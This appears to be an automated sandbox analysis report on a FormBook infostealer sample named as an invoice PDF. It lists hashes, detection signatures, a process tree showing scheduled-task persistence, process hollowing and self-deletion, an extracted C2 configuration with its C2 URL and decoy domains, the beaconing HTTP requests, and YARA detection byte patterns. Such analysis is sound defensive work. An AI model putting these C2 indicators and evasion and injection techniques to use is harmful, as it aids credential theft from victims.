Analysis Report invoice#56432_Pdf.exe

Overview

General Information

Sample Name: invoice#56432_Pdf.exe
Analysis ID: 433430
MD5: 1872fbdcb3e1ecd6d2c7c4c0e3f0542c
SHA1: d3ac7e7add55ae2d25aa6ad3a015e22cd7a3447d
SHA256: 70a1c87cde771cea10a195826a8ddd79003cac8ba3ec50e10cc2be34499fd846

Most interesting Screenshot:

Detection

Threat: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • invoice#56432_Pdf.exe (PID: 240 cmdline: 'C:\Users\user\Desktop\invoice#56432_Pdf.exe' MD5: 1872FBDCB3E1ECD6D2C7C4C0E3F0542C)
    • schtasks.exe (PID: 5872 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UzYBKefg' /XML 'C:\Users\user\AppData\Local\Temp\tmpC457.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 4240 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • schtasks.exe (PID: 5148 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\suSwVklf' /XML 'C:\Users\user\AppData\Local\Temp\tmpCDAE.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • RegSvcs.exe (PID: 4488 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • RegSvcs.exe (PID: 4204 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
        • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 4856 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
            • cmd.exe (PID: 1492 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.martinbrosenterprise.com/nyd/"], "decoy": ["acpqpmq.icu", "byonf.com", "physicianco.com", "wecare4therich.com", "kenziesboutique.com", "coachingfortransformation.co.uk", "redenginegames.info", "allindefi.xyz", "hashflo.com", "carnivalhotels.net", "yogatrac.com", "hotel-gasthof-neukirchen.com", "ebn-lapak.com", "xn--3iqa8101avze.com", "sanimist.store", "studentsafetysheild.store", "themontalbanogroup.com", "oyunhaberler.com", "sportsbooksnv.com", "yogiinthedistrict.com", "corrlib.com", "awpnoqe.icu", "navagecleaningservices.com", "fitangxinyu.com", "vortexhairspray.com", "aminulhaque.info", "tonjilgroup.com", "lifehack.academy", "100001ip.com", "dotacionesmedicasmarmol.com", "poyoiz.com", "alphamillls.com", "disbalef.com", "getuewqarefedre.com", "rekoup.tax", "andalusiaexclusive.com", "eternal-affairs.com", "shessosophisticated.com", "virtualappraisals.online", "hezhongvn.com", "catalogcardgames.com", "8160phaeton.com", "wsacs.xyz", "wibstow.icu", "potoloks-spb.online", "fernholt.com", "relocatetoswitzerland.com", "evservice.network", "atome.science", "shockleymediacenter.com", "omae-mada.xyz", "standingstonecellars.com", "ynabvn.com", "homeofmatriarch.com", "legalteamsolutions.com", "sheensheer.com", "yossiamoday.com", "angelinacamwhalen.site", "garagedoorrepairparts.com", "signworksvalpo.com", "dalalh.info", "jubawu.com", "lifen.club", "wfl.xyz"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | (none)
00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | matched strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | matched strings:
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | (none)
00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | matched strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(23 further memory dump entries are not reproduced on this page)

Unpacked PEs

Source | Rule | Description | Author | Strings
7.0.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | (none)
7.0.RegSvcs.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | matched strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.0.RegSvcs.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | matched strings:
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
7.0.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | (none)
7.0.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | matched strings:
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further unpacked PE entries are not reproduced on this page)

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Start Without DLL
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\invoice#56432_Pdf.exe', ParentImage: C:\Users\user\Desktop\invoice#56432_Pdf.exe, ParentProcessId: 240, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4240
Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\invoice#56432_Pdf.exe', ParentImage: C:\Users\user\Desktop\invoice#56432_Pdf.exe, ParentProcessId: 240, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4240

Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.martinbrosenterprise.com/nyd/"], "decoy": ["acpqpmq.icu", "byonf.com", "physicianco.com", "wecare4therich.com", "kenziesboutique.com", "coachingfortransformation.co.uk", "redenginegames.info", "allindefi.xyz", "hashflo.com", "carnivalhotels.net", "yogatrac.com", "hotel-gasthof-neukirchen.com", "ebn-lapak.com", "xn--3iqa8101avze.com", "sanimist.store", "studentsafetysheild.store", "themontalbanogroup.com", "oyunhaberler.com", "sportsbooksnv.com", "yogiinthedistrict.com", "corrlib.com", "awpnoqe.icu", "navagecleaningservices.com", "fitangxinyu.com", "vortexhairspray.com", "aminulhaque.info", "tonjilgroup.com", "lifehack.academy", "100001ip.com", "dotacionesmedicasmarmol.com", "poyoiz.com", "alphamillls.com", "disbalef.com", "getuewqarefedre.com", "rekoup.tax", "andalusiaexclusive.com", "eternal-affairs.com", "shessosophisticated.com", "virtualappraisals.online", "hezhongvn.com", "catalogcardgames.com", "8160phaeton.com", "wsacs.xyz", "wibstow.icu", "potoloks-spb.online", "fernholt.com", "relocatetoswitzerland.com", "evservice.network", "atome.science", "shockleymediacenter.com", "omae-mada.xyz", "standingstonecellars.com", "ynabvn.com", "homeofmatriarch.com", "legalteamsolutions.com", "sheensheer.com", "yossiamoday.com", "angelinacamwhalen.site", "garagedoorrepairparts.com", "signworksvalpo.com", "dalalh.info", "jubawu.com", "lifen.club", "wfl.xyz"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\UzYBKefg.exe; Metadefender: Detection: 22%
Source: C:\Users\user\AppData\Roaming\UzYBKefg.exe; ReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted file
Source: invoice#56432_Pdf.exe; Virustotal: Detection: 35%
Source: invoice#56432_Pdf.exe; Metadefender: Detection: 22%
Source: invoice#56432_Pdf.exe; ReversingLabs: Detection: 62%
Yara detected FormBook
Source: Yara match; File source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.906109110.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.722070122.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.663797541.0000000003D0F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.722159635.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.660997479.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.905935613.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 7.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: 7.0.RegSvcs.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.RegSvcs.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: invoice#56432_Pdf.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: invoice#56432_Pdf.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 00000008.00000000.679116280.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\JdlLNSkSGv\src\obj\Debug\IsolatedStorageContainment.pdb; source: invoice#56432_Pdf.exe
Source: Binary string: RegSvcs.pdb,; source: help.exe, 00000009.00000002.906326047.0000000002D2D000.00000004.00000020.sdmp, suSwVklf.exe.3.dr
Source: Binary string: wntdll.pdbUGP; source: RegSvcs.exe, 00000007.00000002.722402636.0000000001AEF000.00000040.00000001.sdmp, help.exe, 00000009.00000002.906489870.00000000030DF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: RegSvcs.exe, help.exe
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\JdlLNSkSGv\src\obj\Debug\IsolatedStorageContainment.pdbP; source: invoice#56432_Pdf.exe
Source: Binary string: RegSvcs.pdb; source: help.exe, 00000009.00000002.906326047.0000000002D2D000.00000004.00000020.sdmp, suSwVklf.exe.3.dr
Source: Binary string: help.pdbGCTL; source: RegSvcs.exe, 00000007.00000002.722249778.0000000001980000.00000040.00000001.sdmp
Source: Binary string: help.pdb; source: RegSvcs.exe, 00000007.00000002.722249778.0000000001980000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb; source: explorer.exe, 00000008.00000000.679116280.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 3_2_02B3AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 3_2_02B3AAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 3_2_02B39A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 3_2_02B39A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 3_2_02B3AB61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then pop edi; 7_2_00416C7E
Source: C:\Windows\SysWOW64\help.exe; Code function: 4x nop then pop edi; 9_2_00566C7E

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.martinbrosenterprise.com/nyd/
Source: global traffic; HTTP traffic detected: GET /nyd/?T0=v4hXcVvxmJdL&6l=dkq0cGC/LEW83SVi83HPhPtn9q1O8+UCFQ9WCoc0R0ms29HHTKVnwSEdqKQ2f/ZR/emS HTTP/1.1; Host: www.martinbrosenterprise.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nyd/?6l=j68GMIDNlTjtfEjWHH9a9sxWH2Ka7bvr15iXo/6Hu+1FeN5QCEAjF6MjOch6oz89j9s8&T0=v4hXcVvxmJdL HTTP/1.1; Host: www.potoloks-spb.online; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 166.62.10.181
Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View; ASN Name: BEGET-ASRU
Source: global traffic; HTTP traffic detected: GET /nyd/?T0=v4hXcVvxmJdL&6l=dkq0cGC/LEW83SVi83HPhPtn9q1O8+UCFQ9WCoc0R0ms29HHTKVnwSEdqKQ2f/ZR/emS HTTP/1.1; Host: www.martinbrosenterprise.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nyd/?6l=j68GMIDNlTjtfEjWHH9a9sxWH2Ka7bvr15iXo/6Hu+1FeN5QCEAjF6MjOch6oz89j9s8&T0=v4hXcVvxmJdL HTTP/1.1; Host: www.potoloks-spb.online; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: unknown; DNS traffic detected: queries for: www.martinbrosenterprise.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Fri, 11 Jun 2021 17:59:38 GMT; Server: Apache; Upgrade: h2,h2c; Connection: Upgrade, close; Accept-Ranges: bytes; Vary: Accept-Encoding,User-Agent; Content-Length: 1699; Content-Type: text/html; Data Raw: (hex dump of the HTML "File Not Found" page body)
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: invoice#56432_Pdf.exe, 00000000.00000002.650308648.0000000002721000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.663368608.0000000002C16000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.663288269.0000000002B81000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.663368608.0000000002C16000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: explorer.exe, 00000008.00000000.667430352.0000000002B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: invoice#56432_Pdf.exe, 00000000.00000002.650331627.0000000002759000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.663330979.0000000002BC9000.00000004.00000001.sdmp; String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: invoice#56432_Pdf.exe, 00000000.00000002.650094349.00000000009BA000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.906109110.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.722070122.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.663797541.0000000003D0F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.722159635.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.660997479.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.905935613.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 7.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
Source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.906109110.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.906109110.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.722070122.0000000001560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.722070122.0000000001560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.663797541.0000000003D0F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.663797541.0000000003D0F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.722159635.00000000018D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.722159635.00000000018D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
